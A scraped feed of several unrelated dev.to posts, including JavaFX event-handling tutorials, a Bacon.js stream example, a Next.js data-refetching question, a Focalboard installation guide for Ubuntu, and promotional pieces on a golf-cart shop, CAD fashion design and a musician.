const surnameInput = document.getElementById("surname");
const nameStream = Bacon.fromEvent(nameInput, "input")
.map(event => event.target.value)
.skipDuplicates()
.debounce(300);
const surnameStream = Bacon.fromEvent(surnameInput, "input")
.map(event => event.target.value)
.skipDuplicates()
.debounce(300);
Bacon.combineTemplate({
name: nameStream,
surname: surnameStream
})
.onValue(player => console.log("Player object:", player));
</script>
```
### Explanation
1. **Create Streams from Events**:
- We create a stream (`nameStream`) from the input events of the name field using `Bacon.fromEvent(nameInput, "input")`.
- Similarly, we create a stream (`surnameStream`) for the surname field.
2. **Transform the Data**:
- `map(event => event.target.value)`: Extracts the value from the input event.
- `skipDuplicates()`: Ensures that only unique values are processed, ignoring repeated values.
- `debounce(300)`: Adds a delay of 300 milliseconds to handle fast and consecutive inputs more efficiently.
3. **Combine Streams with `combineTemplate`**:
- We use `Bacon.combineTemplate({ name: nameStream, surname: surnameStream })` to combine the `nameStream` and `surnameStream`. This function takes an object of streams and combines them into a single stream that emits an object containing the latest values from the input streams.
- The combined stream emits an object like `{ name: "John", surname: "Doe" }` whenever any of the input streams emit a new value.
4. **Handle the Result**:
- The resulting stream is passed to `onValue(player => console.log("Player object:", player))`, which logs a "Player object" containing the current name and surname values to the console.
## Why `combineTemplate` is So Important
The `combineTemplate` function in Bacon.js is a powerful tool for combining multiple streams into a single structured object. It simplifies the process of synchronizing multiple data streams and reacting to changes in any of the streams. This makes it particularly useful for forms, UI components, and any scenario where you need to manage and respond to multiple inputs or data sources. By using `combineTemplate`, you can write more readable, maintainable, and efficient code, enhancing your ability to handle complex asynchronous event handling in JavaScript.
| francescoagati |
1,899,351 | Dynamic Drives and Design | Dynamic Drives and Design Address: 950 S 10th St Bldg A-1, Jacksonville Beach, FL 32250 Phone: (904)... | 0 | 2024-06-24T20:36:57 | https://dev.to/ryderwaat/dynamic-drives-and-design-5fhh | carts, golf, florida | Dynamic Drives and Design
Address: 950 S 10th St Bldg A-1, Jacksonville Beach, FL 32250
Phone: (904) 209-9396
Email: info@dynamicdrivesdesign.com
Website: https://dynamicdrivesdesign.com/
GMB Profile: https://www.google.com/maps?cid=973921988340193074
Dynamic Drives and Design is a premier destination for golf cart enthusiasts in Jacksonville Beach, Florida. Nestled at 950 S 10th St Bldg A-1, our establishment stands as a testament to a passion for quality, innovation, and personalized design within the realm of golf carts.
With a dedicated team and a commitment to excellence, Dynamic Drives and Design has become synonymous with top-notch craftsmanship and customer satisfaction. Our showroom is a haven for those seeking the perfect blend of style and functionality in their golf carts.
At the heart of our business is a love for golf carts and the belief that they can be more than just a means of transportation on the green. We specialize in creating custom golf carts that not only perform exceptionally but also reflect the unique personality and preferences of our clients.
Whether you're a golf enthusiast looking for a reliable and stylish companion on the course or someone who sees the potential of a golf cart as a versatile mode of transportation, Dynamic Drives and Design has the expertise to bring your vision to life.
Our commitment to quality extends beyond the products we offer. We take pride in our customer service, striving to ensure that every interaction with Dynamic Drives and Design is a positive and enjoyable experience. Our team is always ready to assist, whether you're browsing our showroom or seeking advice on customizing your golf cart.
For Golf Carts in Jacksonville Beach that seamlessly blend innovation, style, and performance, look no further than Dynamic Drives and Design. Discover the joy of driving a golf cart that's not only reliable on the course but also a reflection of your unique taste and lifestyle. Contact us at (904) 209-9396 or visit our showroom to explore the world of Dynamic Drives and Design Golf Carts.
Store Hours:
Monday - Friday: 8:00 AM - 6:00 PM
Saturday : 9:30 AM -3:00 PM
Sunday Closed
Keywords: Golf Carts Jacksonville Beach, Dynamic Drives & Design Golf Carts | ryderwaat |
1,899,350 | NextJS loading problem 🤨 - refetching api data on revisit #64822 | Summary if i click and navigate to about from the main page after loading of data in main... | 0 | 2024-06-24T20:36:45 | https://dev.to/sh20raj/nextjs-loading-problem-refetching-api-data-on-revisit-64822-3i10 | nextjs, javascript, webdev, beginners | ### Summary
if i click and navigate to about from the main page after loading of data in main page and then i come from about to the main page using navigation i see the loading once or req too the api is sent once more time, I don't want that if the user already loaded the api and navigated then come back it should show the previous data ( even it should show the scroll loc until I scrolled on the main page)
---
"When a user navigates from the main page to the about page after the data has loaded on the main page, and then returns to the main page using navigation, I want to ensure that the data isn't reloaded unnecessarily. I want the previously fetched data to be displayed without triggering another API request. Additionally, I'd like the scroll position of the main page to remain unchanged, even after navigating away from and back to the main page."
https://github.com/SH20RAJ/nextjs-loading-problem/assets/66713844/63a0b094-35c7-4c54-9c10-126feefd4cc7
{% codepen https://codepen.io/SH20RAJ/pen/NWVzRQO %}
> See like youtube is also a single page app and fetches the video feeds from api (client side). but when we navigate to another page then come back we see the previous video feeds but in my case if I come back to my page it recalls the api fetch and show the data (only in case of client component )
> Test and open preview on Stackblitz :- https://stackblitz.com/~/github.com/SH20RAJ/nextjs-loading-problem
> Github Repo :- https://github.com/SH20RAJ/nextjs-loading-problem
Specific Commit :- https://github.com/SH20RAJ/nextjs-loading-problem/tree/84f8788a05479c63cd8737a9d5a340a31aabf69e
// Used Suspense
// Used loading state from useState()
// Used Loading.js
// Still the problem isn't solved yet
// have to do it in client side because server side is working
### Additional information
```js
// Used Suspense
// Used loading state from useState()
// Used Loading.js
// Still the problem isn't solved yet
// have to do it in client side because server side is working
```
### Example
https://stackblitz.com/~/github.com/SH20RAJ/nextjs-loading-problem
---
Answer this is comments or https://github.com/vercel/next.js/discussions/64822
---
I got the answer using swr and here I made a video on it :-
{% youtube https://www.youtube.com/watch?v=OjAwwGV38Ms %}
| sh20raj |
1,899,348 | Innovative CAD Solutions for Sustainable Fashion Design | In the evolving realm of fashion design, innovation and creativity are the keys to success, but... | 0 | 2024-06-24T20:30:06 | https://dev.to/wisdom_collegecreativity/innovative-cad-solutions-for-sustainable-fashion-design-1ho0 | In the evolving realm of fashion design, innovation and creativity are the keys to success, but because of heavy industrialization and urbanization in the past few decades, sustainability has been a crucial point in every field, be it architecture, fashion or engineering. Designers and brands are focusing more on creating sustainable apparel through [CAD for fashion design](https://wisdomdesigncollege.in/cad-fashion-design-course).
But what is CAD and how can it be used for creating sustainable clothing while being both innovative and trendy? You’ll learn all about in and secret tips for aspiring designers in the next 5 minutes!
## What is CAD? How Can It Be Used to Create Sustainable Clothing?
CAD technology has revolutionized the way brands create clothing, CAD stands for Computer-Aided Design and it has become the driving force in fashion designing. It has enhanced design precision, reduced waste and helped designers create sustainable clothing which is known for its longevity. CAD for fashion design has helped brands understand the environmental impact of their designs and focus on aspects like water usage, and carbon footprints, comparing designs made with two different materials and learning more about eco-friendly designing practices.
You can also use CAD for fashion design to apply different templates for fashion designing and stay updated on the latest trends using this cutting-edge software to enhance your creativity, create accurate designs, test out different fabrics and use innovation to create perfection through a slow process of designing which is not just trendy but sustainable. Here are some of the benefits of using CAD for fashion design.
### 1. Precision and Efficiency in Fashion Design
CAD for fashion design has been more than just a digital canvas for streamlining your designs, it is used by designers all over the world to create detailed and precise designs, reducing the margin of error in designing. This ensures that the fabric cuts and design patterns are accurate, minimizing wastage.
Traditional design methods were more time-consuming and prolonged, a revolutionary designing software was needed to help designers become more efficient and finish their final products faster to streamline production. With CAD, designers can quickly draft, modify and perfect their designs.
Tip: Use AI software to forecast future trends, analyze consumer data and create futuristic clothing.
### 2. Fabric Utilization and Eco-Friendly Material Choices through CAD
CAD for fashion design allows fabrics to be utilized in such a way that it maximizes fabric usage and minimizes scraps which helps in reducing textile waste, which is a significant concern in the fashion industry.
Using CAD, designers can understand the use of different materials in their designs and analyze their environmental impact, they can experiment with different materials like organic fabrics, recycled materials, and biodegradable materials, thus promoting sustainability in the designing phase.
### 3. Streamlining Production and Driving Innovation
CAD along with various production planning tools helps streamline the manufacturing process and improves coordination across the supply chain, this ensures that the production process is aligned with sustainable practices to minimize energy consumption and carbon footprints.
CAD in fashion designing allows for easy customization, allowing designers to create tailored clothing, this reduces mass production promotes a sustainable way of creating clothing and improves user satisfaction.
### 4. Slow Fashion
Slow Fashion is not known to most of the consumers in the fashion industry, it is when consumers rent or share clothing, it has gained popularity nowadays due to apps that help in renting your favourite clothing for a few days to months. Men and women all around the globe can swap and borrow clothing from each other which makes clothing more sustainable.
Tip: If you don’t like any clothes you own you can always get something for it online and someone can wear it promoting sustainability in fashion.
## What are the Limitations of using CAD in Fashion Designing?
CAD is not a magical solution to all the sustainability problems in the designing industry, it also has some limitations you need technical knowledge to use CAD for fashion designing efficiently. CAD models are highly dependent on data available and the quality of information just like other AI tools, still, the likelihood of it becoming the center of the process of fashion designing is pretty high.
## [Conclusion]
Fashion designing requires innovation mixed with sustainability and CAD for fashion design is a creative and efficient way of completing your designs in an eco-friendly manner while not compromising on the quality of designs and clothing. | wisdom_collegecreativity | |
1,899,346 | Simplifying Event Handling Using Lambda Expressions | Lambda expressions can be used to greatly simplify coding for event handling. Lambda expressions can... | 0 | 2024-06-24T20:29:33 | https://dev.to/paulike/simplifying-event-handling-using-lambda-expressions-5ajf | java, programming, learning, beginners | _Lambda expressions_ can be used to greatly simplify coding for event handling. _Lambda expressions_ can be viewed as an anonymous class with a concise syntax. For example, the following code in (a) can be greatly
simplified using a lambda expression in (b) in three lines.

The basic syntax for a lambda expression is either
`(type1 param1, type2 param2, ...) -> expression`
or
`(type1 param1, type2 param2, ...) -> { statements; }`
The data type for a parameter may be explicitly declared or implicitly inferred by the compiler. The parentheses can be omitted if there is only one parameter without an explicit data type. In the preceding example, the lambda expression is as follows
`e -> {
// Code for processing event e
}`
The compiler treats a lambda expression as if it is an object created from an anonymous inner class. In this case, the compiler understands that the object must be an instance of **EventHandler<ActionEvent>**. Since the **EventHandler** interface defines the **handle** method with a parameter of the **ActionEvent** type, the compiler automatically recognizes that **e** is a parameter of the **ActionEvent** type, and the statements are for the body of the **handle** method. The **EventHandler** interface contains just one method. The statements in the lambda expression are all for that method. If it contains multiple methods, the compiler will not be able to compile the lambda expression. So, for the compiler to understand lambda expressions, the interface must contain exactly one abstract method. Such an interface is known as a _functional interface_ or a _Single Abstract Method_ (SAM) interface.
AnonymousHandlerDemo.java in [here](https://dev.to/paulike/anonymous-inner-class-handlers-5enc) can be simplified using lambda expressions as shown in the program below.
```
package application;
import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.layout.HBox;
import javafx.stage.Stage;
public class LambdaHandlerDemo extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Hold four buttons in an HBox
HBox hBox = new HBox();
hBox.setSpacing(10);
hBox.setAlignment(Pos.CENTER);
Button btNew = new Button("New");
Button btOpen = new Button("Open");
Button btSave = new Button("Save");
Button btPrint = new Button("Print");
hBox.getChildren().addAll(btNew, btOpen, btSave, btPrint);
// Create and register the handler
btNew.setOnAction((ActionEvent e) -> {
System.out.println("Process New");
});
btOpen.setOnAction((e) -> {
System.out.println("Process Open");
});
btSave.setOnAction(e -> {
System.out.println("Process Save");
});
btPrint.setOnAction(e -> System.out.println("Process Print"));
// Create a scene and place it in the stage
Scene scene = new Scene(hBox, 300, 50);
primaryStage.setTitle("LambdaHandlerDemo"); // Set title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The program creates four handlers using lambda expressions (lines 24–36). Using lambda expressions, the code is shorter and cleaner. As seen in this example, lambda expressions may have many variations. Line 24 uses a declared type. Line 28 uses an inferred type since the type can be determined by the compiler. Line 32 omits the parentheses for a single inferred type. Line 36 omits the braces for a single statement in the body.
You can handle events by defining handler classes using inner classes, anonymous inner classes, or lambda expressions. We recommend that you use lambda expressions because it produces a shorter, clearer, and cleaner code. | paulike |
1,899,345 | Linux History Demystified P:1 | First things first thank you all for the comments and reactions on the first post. Talking about... | 0 | 2024-06-24T20:28:57 | https://dev.to/skyinhaler/linux-history-demystified-p1-2mkb | linux, beginners | First things first thank you all for the comments and reactions on the first post.
Talking about Linux would be incomplete without delving into the history behind this powerful operating system (OS). This high-level overview aims to guide you through the significant stages and notable events that have led to the Linux we know today.
The History of Linux in Four Stages:
**Before 1964**
**1964 - 1984**
**1984 - 1991**
**1991 - Present**
---
## **1. Before 1964**
- During this period, operating systems primarily utilized <mark>Batch Processing</mark>. Although sophisticated for its time, batch processing had major drawbacks, including its dedication to a *single user* and *lack of interactivity*.
### Characteristics of Batch Processing:
* *Job Control Language (JCL)*: Jobs were submitted with a set of commands in a script or control language that specified the sequence of operations.
* *Non-Interactive*: Jobs ran to completion without user modification once submitted.
* *Sequential Execution*: Jobs were processed one after another.
* *Scheduling*: Jobs were scheduled based on priority or resource availability.
### Challenges of Batch Processing:
* *Delayed Processing*: Significant delays occurred between job submission and completion.
* *Lack of Interactivity*: Users couldn't interact with jobs while they were running, which was problematic when immediate feedback or intervention was needed.
* *Complex Job Scheduling*: Managing multiple batch jobs to avoid conflicts and ensure efficient execution was complex and time-consuming.
### Notable Systems:
* *BEYS* (Bell Operating System): Developed at Bell Labs for the IBM 709x series using FORTRAN and SAP.
---
## **2. 1964 - 1984**
- These two decades witnessed a transformation from batch processing to multiprogramming, time-sharing, the adaptation of graphical user interfaces (GUIs), and the advent of networked systems.
### Key Developments:
* *CTSS* (Compatible Time-Sharing System): Developed at MIT for a modified version of the IBM 7090, CTSS was considered the first general-purpose time-sharing OS and a significant influence on future systems.
### Notable Events:
* <mark>1964</mark>: Collaboration among General Electric (GE), Bell Labs, and MIT resulted in MULTICS (Multiplexed Information and Computing Service).
* <mark>1967</mark>: *MULTICS* was delivered to MIT.
* <mark>1969</mark>: Bell Labs withdrew from MULTICS development due to cost, return on investment concerns, and *key developers Ken Thompson and Dennis Ritchie's interest in creating a simpler, more efficient OS*. Shortly after, GE exited the computing industry, selling its division to Honeywell in 1970.
* <mark>1970</mark>: The initial release of *Unix* (originally *Unics*, a play on MULTICS) occurred. It was written in assembly and B language.
* <mark>1971</mark>: Unics became Unix to avoid legal issues and establish a trademark. *Dennis Ritchie began developing the C programming language to improve B language*.
* <mark>1972-1973</mark>: Bell Labs decided to rewrite Unix in C language to enhance efficiency, speed, and portability.
---
At the end if you'd like me to complete the last 2 stages before getting into the core fundamentals of Linux let me know. | skyinhaler |
1,899,344 | Saleheen Muhammad Mustak : A Rising Musical Artist | Saleheen Muhammad Mustak : A Rising Musical Artist Saleheen Muhammad Mustak, born on June 6, 1999,... | 0 | 2024-06-24T20:28:32 | https://dev.to/tanzi_laa_a6e82fb8df0107c/saleheen-muhammad-mustak-a-rising-musical-artist-1jo6 | Saleheen Muhammad Mustak : A Rising Musical Artist
Saleheen Muhammad Mustak, born on June 6, 1999, in Gulapgonj, Sylhet, Bangladesh. Saleheen is not only a talented graphic designer but also a promising Musical Artist. His multifaceted creativity has garnered attention both locally and beyond.
Musical Journey :
Saleheen Muhammad Mustak’s love for music began early in his life. He explored various genres, from classical melodies to contemporary beats. His soulful voice and heartfelt lyrics resonated with listeners, earning him a dedicated fan base. Whether performing at local events or sharing his compositions online, Mustak’s passion for music shines through.
Education and Artistic Balance :
While pursuing a Bachelor of Business Administration (BBA) with a focus on accounting at Dhakadakshin Govt College, Saleheen Muhammad Mustak didn’t neglect his artistic pursuits. His dual interests in music and design allowed him to blend creativity seamlessly. As he studied financial principles, he also composed melodies and penned lyrics, creating a harmonious balance.
Popularity and Impact :
Saleheen Muhammad Mustak’s popularity as a musical artist continues to grow. His soul-stirring performances and relatable lyrics strike a chord with listeners of all ages. Social media platforms showcase his talent, and fans eagerly await new releases. Mustak’s journey exemplifies dedication, hard work, and the power of artistic expression.
Conclusion :
In the vibrant landscape of Bangladeshi music, Saleheen Muhammad Mustak stands out as a rising star. His ability to create meaningful art—whether through design or music—inspires others to follow their passions. As he continues to evolve, we look forward to witnessing his artistic journey unfold. | tanzi_laa_a6e82fb8df0107c | |
1,899,337 | Anonymous Inner Class Handlers | An anonymous inner class is an inner class without a name. It combines defining an inner class and... | 0 | 2024-06-24T20:17:26 | https://dev.to/paulike/anonymous-inner-class-handlers-5enc | java, programming, learning, beginners | An anonymous inner class is an inner class without a name. It combines defining an inner class and creating an instance of the class into one step. Inner-class handlers can be shortened using _anonymous inner classes_. The inner class in ControlCircle.java [here](https://dev.to/paulike/registering-handlers-and-handling-events-3j7e) can be replaced by an anonymous inner class as shown below.

The syntax for an anonymous inner class is shown below
`new SuperClassName/InterfaceName() {
// Implement or override methods in superclass or interface
// Other methods if necessary
}`
Since an anonymous inner class is a special kind of inner class, it is treated like an inner class with the following features:
- An anonymous inner class must always extend a superclass or implement an interface, but it cannot have an explicit **extends** or **implements** clause.
- An anonymous inner class must implement all the abstract methods in the superclass or in the interface.
- An anonymous inner class always uses the no-arg constructor from its superclass to create an instance. If an anonymous inner class implements an interface, the constructor is **Object()**.
- An anonymous inner class is compiled into a class named **OuterClassName$n.class**. For example, if the outer class **Test** has two anonymous inner classes, they are compiled into **Test$1.class** and **Test$2.class**.
The program below gives an example that handles the events from four buttons, as shown in Figure below.

```
package application;
import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.layout.HBox;
import javafx.stage.Stage;
public class AnonymousHandlerDemo extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Hold four buttons in an HBox
HBox hBox = new HBox();
hBox.setSpacing(10);
hBox.setAlignment(Pos.CENTER);
Button btNew = new Button("New");
Button btOpen = new Button("Open");
Button btSave = new Button("Save");
Button btPrint = new Button("Print");
hBox.getChildren().addAll(btNew, btOpen, btSave, btPrint);
// Create and register the handler
btNew.setOnAction(new EventHandler<ActionEvent>() {
@Override // Override the handle method
public void handle(ActionEvent e) {
System.out.println("Process New");
}
});
btOpen.setOnAction(new EventHandler<ActionEvent>() {
@Override // Override the handle method
public void handle(ActionEvent e) {
System.out.println("Process Open");
}
});
btSave.setOnAction(new EventHandler<ActionEvent>() {
@Override // Override the handle method
public void handle(ActionEvent e) {
System.out.println("Process Save");
}
});
btPrint.setOnAction(new EventHandler<ActionEvent>() {
@Override // Override the handle method
public void handle(ActionEvent e) {
System.out.println("Process Print");
}
});
// Create a scene and place it in the stage
Scene scene = new Scene(hBox, 300, 50);
primaryStage.setTitle("AnonymousHandlerDemo"); // Set title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The program creates four handlers using anonymous inner classes (lines 25–51). Without using anonymous inner classes, you would have to create four separate classes. An anonymous handler works the same way as that of an inner class handler. The program is condensed using an anonymous inner class.
The anonymous inner classes in this example are compiled into
**AnonymousHandlerDemo$1.class**, **AnonymousHandlerDemo$2.class**,
**AnonymousHandlerDemo$3.class**, and **AnonymousHandlerDemo$4.class**. | paulike |
1,899,336 | AI Video Editor: Revolutionizing Video Editing | The advent of AI video editors is transforming the landscape of video production, offering... | 0 | 2024-06-24T20:16:00 | https://dev.to/malaikaarora/ai-video-editor-revolutionizing-video-editing-14d2 | editor, codes, ai, free | The advent of AI video editors is transforming the landscape of video production, offering unprecedented convenience and efficiency. These tools are not just a novelty; they are a game-changer for content creators, marketers, and anyone in need of high-quality video content. In this article, we will explore the intricacies of AI video editors, delving into how they are built, how they work, and how they streamline our workload. Along the way, we'll also touch on popular tools like Alight Motion and see how they naturally fit into this evolving ecosystem.
## **How AI Video Editors are Built**

AI video editors are built using a combination of machine learning algorithms, computer vision, and natural language processing. The backbone of these editors is often a neural network trained on massive datasets of videos and user interactions. Here's a breakdown of the key components:
Machine Learning Algorithms: These are used to recognize patterns in video data. For instance, an AI might be trained to identify common video editing tasks such as cutting scenes, adding transitions, or applying filters.
Computer Vision: This technology enables the AI to analyze and understand visual content within the video. It can detect objects, faces, and even the emotions of people in the footage. This capability is crucial for tasks like auto-tagging, scene detection, and object removal.
Natural Language Processing (NLP): NLP allows the AI to understand and respond to textual commands, making it easier for users to interact with the video editor through natural language. For example, you could instruct the AI to "add a transition between these two scenes" or "highlight this object."
Data Sets: Training an AI requires vast amounts of data. These datasets include raw video footage, metadata, and user interaction data. The more diverse and comprehensive the dataset, the better the AI can perform.
User Interface and Experience (UI/UX): The final layer is the interface that users interact with. This must be intuitive and user-friendly, allowing users to harness the power of AI without needing extensive technical knowledge.
**
### How AI Video Editors Work
**
AI video editors operate through a series of automated processes that mimic the decision-making of a human editor. Here's a step-by-step look at how these tools work:
Importing and Analyzing Footage: Users start by importing their raw footage into the AI video editor. The AI then analyzes this footage, identifying key elements such as scenes, objects, and faces.
Automated Editing Suggestions: Based on its analysis, the AI generates editing suggestions. These might include cutting unnecessary scenes, adding transitions, enhancing audio, or applying filters to improve visual appeal.
Customizable Templates: Many AI video editors offer customizable templates that users can apply to their videos. These templates incorporate pre-defined editing styles and effects, making it easy to achieve a professional look with minimal effort.
Interactive Editing: Users can interact with the AI to fine-tune their edits. This interaction can be as simple as clicking on suggested changes or using natural language commands to instruct the AI. For example, you might tell the AI to "shorten this clip by two seconds" or "increase the brightness in this scene."
Rendering and Exporting: Once the editing is complete, the AI renders the video, applying all the changes and optimizations. The final product is then ready to be exported in the desired format.
How AI Streamlines Our Workload
The primary advantage of AI video editors is their ability to significantly streamline the video editing process. Here are some ways they achieve this:
Time Efficiency: Traditional video editing is time-consuming, often requiring hours or even days of work. AI video editors can perform many of these tasks in a fraction of the time, freeing up creators to focus on other aspects of their projects.
Accessibility: AI video editors lower the barrier to entry for video editing. Even those with minimal experience can produce professional-quality videos thanks to the intuitive interfaces and automated suggestions provided by AI tools.
Consistency: AI ensures a consistent quality across edits. This is particularly useful for brands and businesses that need to maintain a uniform style in their video content.

Cost-Effectiveness: By reducing the time and expertise required, AI video editors can lower the overall cost of video production. This makes high-quality video content more accessible to small businesses and individual creators.
Creative Freedom: With routine tasks automated, creators have more time and mental bandwidth to experiment and innovate. This can lead to more creative and engaging content.
**
### Alight Motion: A Natural Fit
**

Alight Motion is one of the popular tools in the video editing space that integrates well with AI technology. Known for its versatility and user-friendly interface, Alight Motion offers features that naturally complement the capabilities of AI video editors. For instance, its support for vector graphics, keyframe animations, and visual effects aligns perfectly with the automated suggestions and enhancements provided by AI. It offers only a premium version, but if you're a starter, you can use [Alight Motion MOD APK](https://alightmotionproapks.in/) for free.
#### **Conclusion**
AI video editors are reshaping the video editing industry, making it more efficient, accessible, and cost-effective. By leveraging machine learning, computer vision, and natural language processing, these tools can perform complex editing tasks with ease and precision. As technology continues to advance, we can expect even more sophisticated AI-driven solutions that further streamline our workflows and enhance our creative capabilities. Tools like Alight Motion exemplify the potential of integrating AI with traditional video editing features, offering a glimpse into the future of content creation. Whether you are a seasoned professional or a novice, AI video editors are an invaluable asset in your toolkit. | malaikaarora |
1,899,334 | How to Install Focalboard on Ubuntu 22.04 | Prerequisites Before beginning the installation, ensure you have: A server running... | 0 | 2024-06-24T20:09:12 | https://dev.to/ersinkoc/how-to-install-focalboard-on-ubuntu-2204-4k2f | vps, selfhosted | #### Prerequisites
Before beginning the installation, ensure you have:
- A server running Ubuntu 22.04 (We recommend using a KVM-based NVMe VPS from [EcoStack Cloud](https://ecostack.cloud) for optimal performance)
- A user account with sudo privileges
- Basic familiarity with the command line
#### Step 1: Update the System
First, update your system packages to the latest versions.
```bash
sudo apt update && sudo apt upgrade -y
```
#### Step 2: Install Required Dependencies
Focalboard requires certain dependencies to run properly. Install them using the following command:
```bash
sudo apt install wget unzip -y
```
#### Step 3: Download Focalboard
Download the latest version of Focalboard from the official GitHub repository:
```bash
wget https://github.com/mattermost/focalboard/releases/download/v7.9.2/focalboard-server-linux-amd64.tar.gz
```
Note: Check the [Focalboard releases page](https://github.com/mattermost/focalboard/releases) for the latest version and update the URL accordingly.
#### Step 4: Extract the Archive
Extract the downloaded tarball:
```bash
tar -xvzf focalboard-server-linux-amd64.tar.gz
```
#### Step 5: Move Focalboard to the appropriate directory
Move the extracted files to a suitable location:
```bash
sudo mv focalboard /opt/
```
#### Step 6: Configure Focalboard
Create a configuration file for Focalboard:
```bash
sudo nano /opt/focalboard/config.json
```
Add the following content, adjusting as needed:
```json
{
"serverRoot": "http://localhost:8000",
"port": 8000,
"dbtype": "sqlite3",
"dbconfig": "/opt/focalboard/focalboard.db",
"useSSL": false,
"webpath": "./pack",
"filespath": "./files",
"telemetry": true,
"session_expire_time": 2592000,
"session_refresh_time": 18000,
"localOnly": false,
"enablePublicSharedBoards": true,
"featureFlags": {}
}
```
Save and close the file.
#### Step 7: Create a Systemd Service File
Create a systemd service file to manage Focalboard:
```bash
sudo nano /etc/systemd/system/focalboard.service
```
Add the following content:
```ini
[Unit]
Description=Focalboard Server
After=network.target
[Service]
Type=simple
Restart=always
RestartSec=5s
ExecStart=/opt/focalboard/bin/focalboard-server
WorkingDirectory=/opt/focalboard
[Install]
WantedBy=multi-user.target
```
Save and close the file.
#### Step 8: Start and Enable Focalboard Service
Start the Focalboard service and enable it to start on boot:
```bash
sudo systemctl start focalboard
sudo systemctl enable focalboard
```
Check the status of the service:
```bash
sudo systemctl status focalboard
```
#### Step 9: Configure Firewall (Optional)
If you're using UFW (Uncomplicated Firewall), allow traffic on port 8000:
```bash
sudo ufw allow 8000/tcp
sudo ufw reload
```
#### Step 10: Access Focalboard
You can now access Focalboard by opening a web browser and navigating to:
```
http://your_server_ip:8000
```
Replace `your_server_ip` with your server's actual IP address or domain name.
#### Conclusion
You have successfully installed Focalboard on Ubuntu 22.04. You can now start creating boards, tasks, and collaborating on projects. For more information on using Focalboard, refer to the [official Focalboard documentation](https://www.focalboard.com/guide/user/).
Remember to keep your system and Focalboard updated regularly for security and performance improvements. If you're using an EcoStack Cloud KVM-based NVMe VPS, you'll benefit from their optimized infrastructure, ensuring smooth operation of your Focalboard instance.
| ersinkoc |
1,899,333 | Inner Classes | An inner class, or nested class, is a class defined within the scope of another class. Inner classes... | 0 | 2024-06-24T20:07:52 | https://dev.to/paulike/inner-classes-g2h | java, programming, learning, beginners | An inner class, or nested class, is a class defined within the scope of another class. Inner classes are useful for defining handler classes.
Inner classes are used in the preceding post. This section introduces inner classes in detail. First, let us see the code in Figure below. The code in Figure below (a) defines two separate classes, **Test** and **A**. The code in Figure below (b) defines **A** as an inner class in **Test**.

The class **InnerClass** defined inside **OuterClass** in Figure above (c) is another example of an inner class. An inner class may be used just like a regular class. Normally, you define a class as an inner class if it is used only by its outer class. An inner class has the following features:
- An inner class is compiled into a class named **OuterClassName$InnerClassName.class**. For example, the inner class **A** in **Test** is compiled into **Test$A.class** in Figure above (b).
- An inner class can reference the data and the methods defined in the outer class in which it nests, so you need not pass the reference of an object of the outer class to the constructor of the inner class. For this reason, inner classes can make programs simple and concise. For example, **circlePane** is defined in **ControlCircle.java** in [here](https://dev.to/paulike/registering-handlers-and-handling-events-3j7e) (line 16). It can be referenced in the inner class **EnlargeHandler** in line 53.
- An inner class can be defined with a visibility modifier subject to the same visibility rules applied to a member of the class.
- An inner class can be defined as **static**. A **static** inner class can be accessed using the outer class name. A **static** inner class cannot access nonstatic members of the outer class.
- Objects of an inner class are often created in the outer class. But you can also create an object of an inner class from another class. If the inner class is nonstatic, you must first create an instance of the outer class, then use the following syntax to create an object for the inner class:
`OuterClass.InnerClass innerObject = outerObject.new InnerClass();`
- If the inner class is static, use the following syntax to create an object for it:
`OuterClass.InnerClass innerObject = new OuterClass.InnerClass();`
A simple use of inner classes is to combine dependent classes into a primary class. This reduces the number of source files. It also makes class files easy to organize since they are all named with the primary class as the prefix. For example, rather than creating the two source files **Test.java** and **A.java** as shown in Figure above (a), you can merge class **A** into class **Test** and create just one source file, **Test.java** as shown in Figure below (b). The resulting class files are **Test.class** and **Test$A.class**.
Another practical use of inner classes is to avoid class-naming conflicts. Two versions of **CirclePane** are defined in [here](https://dev.to/paulike/registering-handlers-and-handling-events-3j7e) ControlCircleWithoutEventHandling.java and ControlCircle.java. You can define them as inner classes to avoid a conflict.
A handler class is designed specifically to create a handler object for a GUI component (e.g., a button). The handler class will not be shared by other applications and therefore is appropriate to be defined inside the main class as an inner class. | paulike |
1,899,332 | Why You Should Learn HTML: The Backbone of Web Development | The term "HTML" stands for HyperText Markup Language and is the standard language for creating web... | 0 | 2024-06-24T20:06:08 | https://dev.to/ridoy_hasan/why-you-should-learn-html-the-backbone-of-web-development-206m | webdev, beginners, learning, tutorial |
The term "HTML" stands for HyperText Markup Language and is the standard language for creating web pages. Learning HTML is essential for anyone interested in web development. Here are the main reasons to learn HTML and its various uses:
### HTML
**Definition**:
- HTML is the foundational markup language used for creating the structure of web pages. It defines elements such as headings, paragraphs, links, images, and more, providing the basic layout and content of a webpage.
**Key Components**:
- **Elements**: HTML uses tags to create elements that structure and format the content on the web. Common elements include `<div>`, `<p>`, `<a>`, `<img>`, and `<form>`.
- **Attributes**: Elements can have attributes like `id`, `class`, `href`, and `src` to provide additional information and functionality.
**Benefits**:
- **Foundation of Web Development**: HTML is the starting point for learning web development. It is a must-know for anyone pursuing a career in this field.
- **Accessibility**: Well-structured HTML ensures websites are accessible to all users, including those with disabilities.
- **SEO**: Proper use of HTML elements improves search engine optimization, making websites more discoverable.
- **Cross-Compatibility**: HTML is universally supported by all web browsers, ensuring your content is accessible to everyone.
**Use Cases**:
- **Web Pages**: Building the structure of web pages for personal blogs, business websites, portfolios, and more.
- **Email Templates**: Creating visually appealing and responsive email templates.
- **Web Applications**: Forming the backbone of front-end development in web applications, paired with CSS and JavaScript.
### Conclusion
Learning HTML is the first step toward becoming a proficient web developer. It provides the essential structure for all web content and is a critical skill for creating accessible, SEO-friendly, and universally compatible websites. Start with HTML to lay a strong foundation for your web development journey.
connect with me on LinkedIn -https://www.linkedin.com/in/ridoy-hasan7
| ridoy_hasan |
